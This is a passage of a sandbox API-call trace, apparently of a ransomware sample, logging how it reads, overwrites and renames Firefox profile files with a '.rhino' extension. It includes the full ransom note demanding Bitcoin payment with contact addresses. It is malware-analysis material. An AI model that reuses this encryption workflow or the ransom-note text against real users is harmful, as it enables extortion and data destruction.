HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.083] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2400078 | out: hHeap=0x6d0000) returned 1 [0104.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0104.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0104.084] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0104.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0104.084] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0104.084] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0104.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0104.084] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.084] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.098] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1d [0104.098] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13d, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.098] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.099] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1d, lpOverlapped=0x0) returned 1 [0104.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.100] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.100] GetLastError () returned 0x0 [0104.101] SetLastError (dwErrCode=0x0) [0104.101] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1d) returned 0x6e8980 [0104.101] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0104.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0104.101] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.101] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0104.101] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.101] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0104.101] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0104.102] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0104.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.102] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0104.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.102] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.102] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e89a8 [0104.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.102] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89a8 | out: hHeap=0x6d0000) returned 1 [0104.102] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13d) returned 0x75f208 [0104.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.102] WriteFile (in: hFile=0x104, lpBuffer=0x75f208*, nNumberOfBytesToWrite=0x13d, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f208*, lpNumberOfBytesWritten=0x2cfa04*=0x13d, lpOverlapped=0x0) returned 1 [0104.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0104.103] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.103] CloseHandle (hObject=0x104) returned 1 [0104.104] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0104.104] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75f208 [0104.105] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0104.105] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0104.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0104.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.106] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0104.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0104.106] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0104.106] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0104.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0104.106] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.106] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.107] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x2 [0104.107] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x122, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.107] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.107] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x2, lpOverlapped=0x0) returned 1 [0104.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.109] GetLastError () returned 0x0 [0104.110] SetLastError (dwErrCode=0x0) [0104.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.110] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b7f8 [0104.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.110] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0104.110] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0104.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0104.110] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.110] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b818 [0104.110] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0104.110] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x122) returned 0x75f208 [0104.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.110] WriteFile (in: hFile=0x104, lpBuffer=0x75f208*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f208*, lpNumberOfBytesWritten=0x2cfa04*=0x122, lpOverlapped=0x0) returned 1 [0104.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0104.110] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x122, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.110] CloseHandle (hObject=0x104) returned 1 [0104.112] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0104.112] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x75f208 [0104.112] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0104.112] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0104.113] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0104.113] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0104.113] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.113] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75ef78 [0104.113] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0104.113] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75f040 [0104.113] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75f108 [0104.113] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f040 | out: hHeap=0x6d0000) returned 1 [0104.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.114] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0104.114] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0104.115] CloseHandle (hObject=0x104) returned 1 [0104.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f108 | out: hHeap=0x6d0000) returned 1 [0104.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0104.118] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x18000 [0104.118] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18120, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.118] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.118] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0104.120] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.121] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x18000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x18000, lpOverlapped=0x0) returned 1 [0104.124] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0104.124] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.124] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0104.124] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.124] GetLastError () returned 0x0 [0104.124] SetLastError (dwErrCode=0x0) [0104.124] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.124] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18023) returned 0x70a650 [0104.125] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x722680 [0104.125] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x722788 [0104.125] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722680 | out: hHeap=0x6d0000) returned 1 [0104.125] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0104.125] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0104.125] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0104.125] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0104.125] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0104.125] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0104.125] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e74c8 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x722680 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x722910 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722680 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x722a58 [0104.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722910 | out: hHeap=0x6d0000) returned 1 [0104.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x722c40 [0104.127] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722a58 | out: hHeap=0x6d0000) returned 1 [0104.127] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x722f10 [0104.127] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722c40 | out: hHeap=0x6d0000) returned 1 [0104.127] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x723348 [0104.127] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722f10 | out: hHeap=0x6d0000) returned 1 [0104.127] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x722910 [0104.127] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x723348 | out: hHeap=0x6d0000) returned 1 [0104.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x723278 [0104.137] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722910 | out: hHeap=0x6d0000) returned 1 [0104.137] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x724090 [0104.137] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x723278 | out: hHeap=0x6d0000) returned 1 [0104.137] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7255d0 [0104.137] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x724090 | out: hHeap=0x6d0000) returned 1 [0104.137] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x727598 [0104.137] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7255d0 | out: hHeap=0x6d0000) returned 1 [0104.137] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x722910 [0104.137] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x727598 | out: hHeap=0x6d0000) returned 1 [0104.137] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75f040 [0104.138] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722910 | out: hHeap=0x6d0000) returned 1 [0104.138] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0104.139] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f040 | out: hHeap=0x6d0000) returned 1 [0104.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0104.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0104.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0104.143] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0104.144] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x23b0048 [0104.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0104.147] WriteFile (in: hFile=0x104, lpBuffer=0x23b0060*, nNumberOfBytesToWrite=0x18120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0060*, 